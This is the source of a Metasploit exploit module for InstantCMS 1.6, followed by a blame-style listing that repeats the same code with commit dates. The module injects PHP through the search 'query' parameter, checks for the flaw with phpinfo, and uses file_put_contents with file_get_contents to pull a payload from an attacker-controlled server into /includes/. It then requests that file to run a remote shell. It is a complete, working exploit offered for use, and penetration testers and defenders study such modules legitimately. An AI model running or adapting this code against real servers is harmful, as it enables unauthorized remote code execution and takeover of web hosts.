metasploit-framework/modules/exploits/unix/webapp/instantcms_exec.rb

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'			=> 'InstantCMS 1.6 Remote PHP Code Execution',
			'Description'		=> %q{	This module exploits an arbitrary command execution vulnerability in the InstantCMS versions 1.6 },
			'Author'		=> [ 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>'	# Metasploit module
			],
			'License'		=> MSF_LICENSE,
			'References'		=>
				[
					['URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html'],
				],
			'Privileged'	=> false,
			'Platform' => ['php'],
			'Arch' => ARCH_PHP,
			'Targets'	=> [[ 'Automatic', { }]],
			'DisclosureDate'	=> 'Jun 26 2013',
			'DefaultTarget'	=> 0))

			register_options(
				[
					OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"]),
				], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => normalize_uri(datastore['URI']),
			'vars_get' =>
			{
				'view'	=> 'search',
				'query' => '${echo phpinfo()}'
			}
		})

		if res
			if res.body.match(/Build Date/)
				return Exploit::CheckCode::Vulnerable
			else
				return Exploit::CheckCode::Safe
			end
		else
			return Exploit::CheckCode::Unknown
		end

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
	end

	def on_request_uri(cli, request)
		#print_status("on_request_uri called: #{request.inspect}")
		send_response(cli, payload.encoded)
	end

	def exploit

		return if not check == Exploit::CheckCode::Vulnerable

		begin
			fname = Rex::Text.rand_text_alpha(3) + ".php"
			resource_uri = '/' + Rex::Text.rand_text_alpha(3)

			sploit_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}"

			sploit_fname = fname.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
			shell_uri = sploit_uri.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')

			exec = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')

			start_service({
				'Uri' => {
					'Proc' => Proc.new { |cli, req|	on_request_uri(cli, req)
				},
				'Path' => resource_uri }})

			print_status("Creating the shell on http://#{rhost}:#{rport}/includes/#{fname}")

			res = send_request_cgi({
				'uri'      => normalize_uri(datastore['URI']),
				'vars_get' =>
				{
					'view'	=> 'search',
					'query' => '${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).'+sploit_fname+',file_get_contents('+shell_uri+'))}'
				}
			})

			if res
				if res.code == 200
					print_status("Shell created successfully.")
				else
					fail_with(Exploit::Failure::Unknown, "The server returned: #{res.code} #{res.message} - Failed to upload the shell.")
					stop_service
				end
			else
				fail_with(Exploit::Failure::Unknown, 'No response from the server.')
				stop_service
			end

			res = send_request_raw({
				'uri'      => normalize_uri(datastore['URI'], "includes", fname),
			})

			if res
				if res.code == 200
					print_status("Requesting the shell.")
				else
					fail_with(Exploit::Failure::Unknown, "The server returned: #{res.code} #{res.message} - Failed to request the reverse shell.")
					stop_service
				end
			else
				fail_with(Exploit::Failure::Unknown, 'No response from the server.')
				stop_service
			end

			stop_service

			rescue Exploit::CheckCode::Unknown
		end
	end
end
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`require 'msf/core'`


			`class Metasploit3 < Msf::Exploit::Remote`

Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`include Msf::Exploit::Remote::HttpClient`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`include Msf::Exploit::Remote::HttpServer`

			`def initialize(info = {})`
			`super(update_info(info,`
Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',`
			`'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the InstantCMS versions 1.6 },`
			`'Author' => [ 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>' # Metasploit module`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html'],`
			`],`
Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`'Privileged' => false,`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`'DisclosureDate' => 'Jun 26 2013',`
Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`'DefaultTarget' => 0))`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
			`register_options(`
			`[`
Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"]),`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`], self.class)`
			`end`

			`def check`
			`res = send_request_cgi({`
			`'uri' => normalize_uri(datastore['URI']),`
			`'vars_get' =>`
			`{`
			`'view' => 'search',`
			`'query' => '${echo phpinfo()}'`
			`}`
Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`})`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
			`if res`
			`if res.body.match(/Build Date/)`
			`return Exploit::CheckCode::Vulnerable`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`else`
			`return Exploit::CheckCode::Unknown`
			`end`

			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`
			`end`

			`def on_request_uri(cli, request)`
Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`#print_status("on_request_uri called: #{request.inspect}")`
Update instantcms_exec.rb 2013-07-01 21:03:37 +00:00			`send_response(cli, payload.encoded)`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`end`

			`def exploit`

			`return if not check == Exploit::CheckCode::Vulnerable`

			`begin`
			`fname = Rex::Text.rand_text_alpha(3) + ".php"`
			`resource_uri = '/' + Rex::Text.rand_text_alpha(3)`

Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`sploit_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}"`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
			`sploit_fname = fname.unpack('C*').map! { \|ch\| ch = "chr(#{ch})" }.join('.')`
			`shell_uri = sploit_uri.unpack('C*').map! { \|ch\| ch = "chr(#{ch})" }.join('.')`

Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`exec = payload.encoded.unpack('C*').map! { \|ch\| ch = "chr(#{ch})" }.join('.')`

			`start_service({`
			`'Uri' => {`
			`'Proc' => Proc.new { \|cli, req\| on_request_uri(cli, req)`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`},`
Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`'Path' => resource_uri }})`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00
			`print_status("Creating the shell on http://#{rhost}:#{rport}/includes/#{fname}")`

			`res = send_request_cgi({`
			`'uri' => normalize_uri(datastore['URI']),`
			`'vars_get' =>`
			`{`
			`'view' => 'search',`
			`'query' => '${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).'+sploit_fname+',file_get_contents('+shell_uri+'))}'`
			`}`
			`})`

Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`if res`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`if res.code == 200`
			`print_status("Shell created successfully.")`
			`else`
			`fail_with(Exploit::Failure::Unknown, "The server returned: #{res.code} #{res.message} - Failed to upload the shell.")`
Update instantcms_exec.rb 2013-07-01 21:03:37 +00:00			`stop_service`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`end`
			`else`
			`fail_with(Exploit::Failure::Unknown, 'No response from the server.')`
Update instantcms_exec.rb 2013-07-01 21:03:37 +00:00			`stop_service`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`end`

			`res = send_request_raw({`
			`'uri' => normalize_uri(datastore['URI'], "includes", fname),`
			`})`

Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`if res`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`if res.code == 200`
Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`print_status("Requesting the shell.")`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`else`
			`fail_with(Exploit::Failure::Unknown, "The server returned: #{res.code} #{res.message} - Failed to request the reverse shell.")`
Update instantcms_exec.rb 2013-07-01 21:03:37 +00:00			`stop_service`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`end`
			`else`
			`fail_with(Exploit::Failure::Unknown, 'No response from the server.')`
Update instantcms_exec.rb 2013-07-01 21:03:37 +00:00			`stop_service`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`end`

			`stop_service`

Update instantcms_exec.rb 2013-07-02 16:26:14 +00:00			`rescue Exploit::CheckCode::Unknown`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 15:44:47 +00:00			`end`
			`end`
			`end`